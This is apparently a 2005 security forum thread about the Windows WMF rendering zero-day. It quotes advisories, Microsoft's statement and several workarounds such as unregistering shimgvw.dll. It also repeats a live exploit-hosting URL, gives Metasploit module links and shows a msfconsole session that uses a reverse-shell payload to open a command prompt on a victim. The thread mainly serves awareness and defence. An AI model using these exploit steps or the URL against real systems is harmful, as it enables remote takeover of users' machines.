** HEADS UP ** IE vulnerability. EXTREMELY CRITICAL.

Greeting's

Here we go again :rolleyes: .

http://www.frsirt.com/english/advisories/2005/3086

A vulnerability has been identified in Microsoft Windows, which could be exploited by remote attackers to execute arbitrary commands. This flaw is due to an error in the rendering of Windows Metafile (WMF) image formats, which could be exploited by attackers to remotely take complete control of an affected system by convincing a user to open a malicious WMF file using a vulnerable application that renders WMF images (e.g. Windows Picture and Fax Viewer), or visit a specially crafted Web page that is designed to automatically exploit this vulnerability through Internet Explorer.

Quote:

---

This unpatched vulnerability is currently being exploited in the wild. Other browsers are also vulnerable if a user chooses to manually download and view a malicious WMF file.

---

Quote:

---

Microsoft Windows XP Service Pack 1
Microsoft Windows XP Service Pack 2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003 for Itanium-based Systems
Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
Microsoft Windows Server 2003 x64 Edition

---

http://secunia.com/advisories/18255/

Quote:

---

Exploit code is publicly available. This is being exploited in the wild

---

:eek:

Great work micro$oft (once again)
http://www.securityfocus.com/brief/89
http://www.securityfocus.com/archive/1/420288

I posted this same vulnerability about 4 hours ago in another thread called Windows WMF 0-day exploit in the wild. I will just move that post into this thread as it seems to have moved down the list.

**********************************
Earlier post

Hello,

I was on the SANS ISC this morning and read a diary entry for a Windows WMF 0-day exploit in the wild. Go here for the information: http://isc.sans.org/ But to paraphrase the diary:

Quote:

---

Just when we thought that this will be another slow day, a link to a working unpatched exploit in, what looks like Windows Graphics Rendering Engine, has been posted to Bugtraq.
...
The HTML file runs another WMF (Windows Meta File) which executes a trojan dropper on a fully patched Windows XP SP2 machine. The dropper will then download Winhound, a fake anti-spyware/virus program which asks user to purchase a registered version of software in order to remove the reported threats.
...
According to F-Secure's blog "Firefox users can get infected if they decide to run or download the image file."

---

Also, I am on the Metaploit mailing list, and it appears that there is already an plugin available for the exploit. http://metasploit.com/projects/Frame...p_pfv_metafile

Should be a fun one!
-Deeboe

Link: http://isc.sans.org/

Updated Story on ISC going Yellow:

Quote:

---

Handler's Diary December 28th 2005

previous -

* Update on Windows WMF 0-day (NEW)
Published: 2005-12-28,
Last Updated: 2005-12-28 19:07:59 UTC by Daniel Wesemann (Version: 1)

Update 19:07 UTC: We are moving to Infocon [gloworange]Yellow[/gloworange] for a bit. There has been some debate among the handlers about this step, but considering that a lot of people are on holidays and might otherwise miss the WMF 0-day problem, we have decided to raise the alert level.

The orignal exploit site (unionseek.com) is no longer up. But the exploit is being served from various sites all over by now, see the F-Secure Blog on http://www.f-secure.com/weblog/ for an update on the versions of the exploit found in the wild.

---

Apologies if someone else already beat me to the punch on the update.


UPDATE... yet again - heh - just a quick blurb as of [gloworange]Update 19:07 UTC[/gloworange]:

Quote:

---

Working exploit code is widely available, and has also been published by FRSIRT and the Metasploit Framework.

---

This obviously coincides with the posts following what I threw up me'ah - the next 12-24 should be fun. Think I'll start drinking now.

Warning the following URL successfully exploited a fully patched windows xp system with a freshly updated norton anti virus.

unionseek.com/d/t1/wmf_exp.htm

The url runs a .wmf and executes the virus, f-secure will pick up the virus norton will not.

Earlier post from ISC earlier today:

Quote:

---

The posted URL is [ uni on seek. com/ d/t 1/ wmf_exp. htm ]
(DON'T GO HERE UNLESS YOU KNOW WHAT YOU'RE DOING. Added spaces to avoid accidental clicking. See Firefox note below!!)

---

Quote from ISC later in the day:

Quote:

---

The orignal exploit site (unionseek.com) is no longer up. But the exploit is being served from various sites all over by now, see the F-Secure Blog on http://www.f-secure.com/weblog/ for an update on the versions of the exploit found in the wild.

---

Gore, I am not going to browse to the site on this computer, but are you saying that the unionseek.com site is back up?

-Deeboe

well for windows users this is normal everyday life. im glad i support this :D .......*cough* for some reason i cant say that with a straight face.

Don't know, I'm not dumb enough to go to it.

Metasploit Framework in case anyone wants to
test it without installing a thousand spyware apps...

Available from 'msfupdate' for MSF users, or in the 2.5 snapshot:

--http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
--http://metasploit.com/tools/framework-2.5-snapshot.tar.gz

Tested on Win XP SP1 and SP2.

-HD

+ -- --=[ msfconsole v2.5 [147 exploits - 77 payloads]

msf > use ie_xp_pfv_metafile
msf ie_xp_pfv_metafile > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf ie_xp_pfv_metafile(win32_reverse) > set LHOST 192.168.0.2
LHOST -> 192.168.0.2
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.[*] Waiting for connections to http://0.0.0.0:8080/anything.wmf[*] HTTP Client connected from 192.168.0.219:1060 using Windows XP[*] Got connection from 192.168.0.2:4321 <-> 192.168.0.219:1061

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\XXXX\Desktop>

This should act as a fix, since it should avoid any rendering of the file. It wont fix the vulnerability, but it will prevent auto-ownage via the browser or IM until a patch is ready.

Control panel, folder options... then view the attachment.

http://www.frsirt.com/exploits/20051...etafile.pm.php

Pffft. Easy work around tested by yours truly.

1. Click on the Start button on the taskbar.
2. Click on Run...
3. Type "regsvr32 /u shimgvw.dll" to disable.
4. Click ok when the change dialog appears.
When a patch is available, re-register the shimgvw.dll (regsvr32 shimgvw.dll).

Also, all you firefox users, you too can be hosed by this exploit. If you have the google toolbar installed you will be autopwn3d. I'm going to step through it in meh lab in the mornin.

--TH13

Quote:

---

Originally posted here by thehorse13
Pffft. Easy work around tested by yours truly.

1. Click on the Start button on the taskbar.
2. Click on Run...
3. Type "regsvr32 /u shimgvw.dll" to disable.
4. Click ok when the change dialog appears.
When a patch is available, re-register the shimgvw.dll (regsvr32 shimgvw.dll).

Also, all you firefox users, you too can be hosed by this exploit. If you have the google toolbar installed you will be autopwn3d. I'm going to step through it in meh lab in the mornin.

--TH13

---

If I understand this correctly, this unregisters the shimgvw.dll as a command component from the registry, which will prevent Windows from using it. Not being able to use it, it won't be able to display pictures or faxes.

Will it still display icons, though? Basically, what does it break and how badly?

- X

Quote:

---

Will it still display icons, though? Basically, what does it break and how badly?

---

shimgvw.dll is a library which contains COM functions used for image rendering. It's used when displaying images and/or faxes. If shimgvw.dll is unavailable, windows may not be able to display faxes or images. If this is not a problem for you, you can safely remove this file.

Quote:

---

Originally posted here by thehorse13
shimgvw.dll is a library which contains COM functions used for image rendering. It's used when displaying images and/or faxes. If shimgvw.dll is unavailable, windows may not be able to display faxes or images. If this is not a problem for you, you can safely remove this file.

---

Hmmmm. That seems like it would break quite a bit, as the all your icons are image files, your system tray has image files, etc.

- X

It will not hurt your desktop icons, however, if you are a pr0n hound, you won't want to do this because you can't render image files.

Quote:

---

Originally posted here by thehorse13
It will not hurt your desktop icons, however, if you are a pr0n hound, you won't want to do this because you can't render image files.

---

Ok, cool. No problems there. :p

This also works through the command prompt. I am trying to expoit my 'own' machine for learning purposes so every bit of information helps. Thanks CN22

Hello,

I just saw that Microsoft has released thier statement on this:

Quote:

---

Microsoft is investigating new public reports of a possible vulnerability in Windows. Microsoft will continue to investigate the public reports to help provide additional guidance for customers.
...
Customers are encouraged to keep their antivirus software up to date. The Microsoft Windows AntiSpyware (Beta) can also help protect your system from spyware and other potentially unwanted software. We will continue to investigate these public reports.
...
Upon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This will include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.

---

Well, that is reassuring. :verypisse

You can find the whole article here: http://www.microsoft.com/technet/sec...ry/912840.mspx

-Deeboe

Quote:

---

Originally posted here by thehorse13
It will not hurt your desktop icons, however, if you are a pr0n hound, you won't want to do this because you can't render image files.

---

Damn...wont be implementing this fix, will go with Soda's. :o

Thanks hoss.

FYI: We started filtering (stripping off) WMF attachments from emails as a precaution.
(...waits for patch from MS...)

Why do you guys call him Hoss? I don't understand that. Is it like weird slang for horse?

I found a good Anti Virus that seems to take away your vulnerability to this exploit here:

http://lmlinux.com/distros/slackware...install-d1.iso

http://lmlinux.com/distros/slackware...install-d2.iso

Haven't had a problem since. ;)

Quote:

---

Originally posted here by gore
Why do you guys call him Hoss? I don't understand that. Is it like weird slang for horse?

---

It's the hick/redneck pronounciation of "horse", I think.

Holy crap?! One of the AV packages is over 600 megs?! How many definitions does that thing have?! ;)

- Xierox

All but about 5 or so.

I'm gonna have to try that out... :D

I'm not gonna make any smart ass comments,
I promise. I swear. No, I really mean it.
:cool:

Quote:

---

Originally posted here by gore
Why do you guys call him Hoss? I don't understand that. Is it like weird slang for horse?

---

I picked this nickname up from someone (dont remember who) else here who referred him this way. Just a nickname...but didn't realize it was redneck-ish...I'm not one so wouldnt know. ;-)

i'm just curious...does any type of security software stand a chance against defending this exploit at the moment?

The one I linked to does.

Quote:

---

Originally posted here by corrupted_code
i'm just curious...does any type of security software stand a chance against defending this exploit at the moment?

---

I'll take my best crack at it (but I am far from a guru on this sort of thing, yet).

Home Computer Software Solution:
1) Antivirus.
Cons:
- Signature Based (Will only pick up known viruses)
- Will most likely only catch viruses after infection

Large Network:
1) (Possibly?) An Intrusion Detection System (if I understand what they do)
Cons:
- Signature Based (Will only pick up known viruses)

Don't quote me on any of this. :) I took my best shot, but I could very well be wrong.

- Xierox

Quote:

---

Warning the following URL successfully exploited a fully patched windows xp system with a freshly updated norton anti virus.

unionseek.com/d/t1/wmf_exp.htm

The url runs a .wmf and executes the virus, f-secure will pick up the virus norton will not.

---

I actually clicked on that link what basically happened to my computer was as followed :

1. All my icons were deleted with the exception of some obscure file being created cant remember the name ..
2. My wallpaper just disappeared and the background image was just random colours flashing ...
3. Pressing ATL+CTRL+DEL would not allow me to access Windows Task Manager .. Kept on telling me that I didn't have Administrative rights ....
4. Right Click was disabled as well so I wasn't able to access my Display Properties ...
5. Norton Internet Security Suite was completely disabled ... Heck I wasn't even able to use it in Safe Mode ...

That's what happened when I clicked on it ....

B.T.W. I was running Windows XP SP2 fully patched , Norton Internet Security 2005 latest definitions ... Ewido Anti-Malware 3.5 ... I did a scan with Ewido and before I was clean but once I clicked that link and did a full scan it found Spyware.MiniBug and Spyware.CoolWebSearch well registry entries to be exact ...

Dont let your curiosity get the best of ya ...

What browser, Agent_Steal?

- X

Hi there Xierox the browser that I use is :

Microsoft Internet Explorer Version 6.0.2900.2180.xpsp_sp2_gdr.050301-1519 ... Exactly what it says in the About Internet Explorer dialog box ...

Before I forget I clicked on that linked yesterday ...

B.T.W. before you decide to unleash this little beast on your computer make sure that you back up anything important .. Just curious has anyone else on here infected themselves yet ???

Quote:

---

Just curious has anyone else on here infected themselves yet ?

---

I hooked up a old box last night, and deliberatly infected the machine with it..

Quote:

---

Just curious has anyone else on here infected themselves yet ???

---

I clicked on the link and I also went to the link, for **** and giggles of course, before I posted that .bmp image. I didn't notice anything happen to my system. ALL software is up-to-date web browser is 6.0.2800.1106 for windows 2000 pro.

I believe I coined the name Hoss.... Based on the character from that cowboy show years ago....

Bleeding Snort has a sig for this for those of you with networks to defend..... www.bleedingsnort.org

Bonanza :D

http://bonanza1.com/hoss/

:)

Ahhh.... Your brain cell works better than mine..... Haven't finished my third coffee yet...... ;)

Just found another workaround posted here

http://www.eweek.com/article2/0,1895...05dtx1k0000599

Quote:

---

The same effect may be obtained with a registry change. In the Regedit program go to the key:

HKEY_LOCAL_MACHINE\SOFTWARE\Classes
\SystemFileAssociations\image
\ShellEx\ContextMenuHandlers
\ShellImagePreview

Then delete the default value. To re-enable the feature, go to the same key and set the default value as a REG_SZ to "{e84fda7c-1d6a-45f6-b725-cb260c236066}". You may download .REG files that perform these tasks from Athias's message.

---

MLF

Peeps.. this is NOT just an IE vulnerability - it's an OS vulnerability that is not browser dependent, so Firefox etc users are still potentially vulnerable.

Theoretically, any internet application could download the WMF file - browser, mail client, IM application, P2P client etc. From the reports I've seen, once the infected WMF file is anywhere on your system, there's a risk that Shimgvw.dll might fire up and execute the exploit. (Google Desktop has been cited as a culprit here too).

At the moment, it seems to be a few infected web sites but there are many other ways that the exploit could be used:

• Embedded in an email message (it doesn't need to be an attachment). If you have autopreview on, then the exploit would run automatically without having to do very much.
• In the past, legitimate advertising networks have been compromised to spread exploits. It seems that you can rename the WMF extension to something else, and it's STILL possible to infect the machine as the OS doesn't rely on the extension alone.
• Through network shares on a corporate network (because of the thumbnailing function).
• It must also be theoretically possible to infect a Windows-based web server by uploading an infected file to somewhere that the DLL will trigger. That site could then be used to serve up infected WMF files to visitors. We've seen exploits like this before.

I think the ONLY safe thing to do is de-register the DLL until there's a fix. At the moment, the threat is contained, but because the code is now available it's only going to be a matter of time before we see this becoming more widespread.

Quote:

---

Un-register the Windows Picture and Fax Viewer (Shimgvw.dll) on Windows XP Service Pack 1; Windows XP Service Pack 2; Windows Server 2003 and Windows Server 2003 Service Pack 1

To un-register Shimgvw.dll, follow these steps:

1. Click Start, click Run, type "regsvr32 -u %windir%\system32\shimgvw.dll" (without the quotation marks), and then click OK.

2. A dialog box appears to confirm that the un-registration process has succeeded. Click OK to close the dialog box.

Impact of Workaround: The Windows Picture and Fax Viewer will no longer be started when users click on a link to an image type that is associated with the Windows Picture and Fax Viewer.

To undo this change, re-register Shimgvw.dll by following the above steps. Replace the text in Step 1 with “regsvr32 %windir%\system32\shimgvw.dll” (without the quotation marks).

---

I guess in a corporate environment it should be possible to run REGSVR32 remotely using PSEXEC or AT.

I have a hint for those who might want to know why Windows
(which all the accredited experts have proven to be more
secure that linux) keeps tripping up on this stuff. Think
compartmentalization.

Code and data, which ought to have been separated, are
hopelessly intertwined in everything Microsoft does.
Ask your favorite Windzz fanboy why a document
or image needs to have executable code in it.

Ask him why the OS obediently executes this embedded
code.
"It's a feature, not a bug" "It's there to give you a richer
web experience"

It is there to satisfy greedy web designers who want more
control over your web experience, and as long as this design
philosophy prevails, you can expect these magical features
to be a playground for lamers and crackers.
:cool:

BTW, this is not a vulnerability. (you listening catch?)
The OS is only doing what was designed to do.
Your only fix is to deliberately break the OS
by disabling the dll that provides you with all this
rich functionality.
LMAO.